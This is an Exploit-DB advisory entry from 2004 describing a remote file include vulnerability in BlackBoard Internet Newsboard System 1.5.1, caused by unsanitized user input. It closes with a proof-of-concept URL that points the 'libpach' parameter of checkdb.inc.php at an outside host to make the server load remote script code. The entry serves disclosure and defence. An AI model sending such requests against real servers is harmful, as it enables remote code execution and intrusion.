BlackBoard Internet Newsboard System 1.5.1 - Remote File Include Vulnerability

2004-10-06T00:00:00
ID EDB-ID:24657
Type exploitdb
Reporter Lin Xiaofeng
Modified 2004-10-06T00:00:00

Description

BlackBoard Internet Newsboard System 1.5.1 Remote File Include Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/11336/info

BlackBoard Internet Newsboard System is reported prone to a remote file include vulnerability. This issue presents itself because the application fails to sanitize user-supplied data properly. This issue may allow an attacker to include malicious files containing arbitrary script code to be executed on a vulnerable computer.

BlackBoard Internet Newsboard System version 1.5.1 is reported prone to this vulnerability. It is possible that prior versions are affected as well.

http://www.example.com/bb_lib/checkdb.inc.php?libpach=http://www.example.com/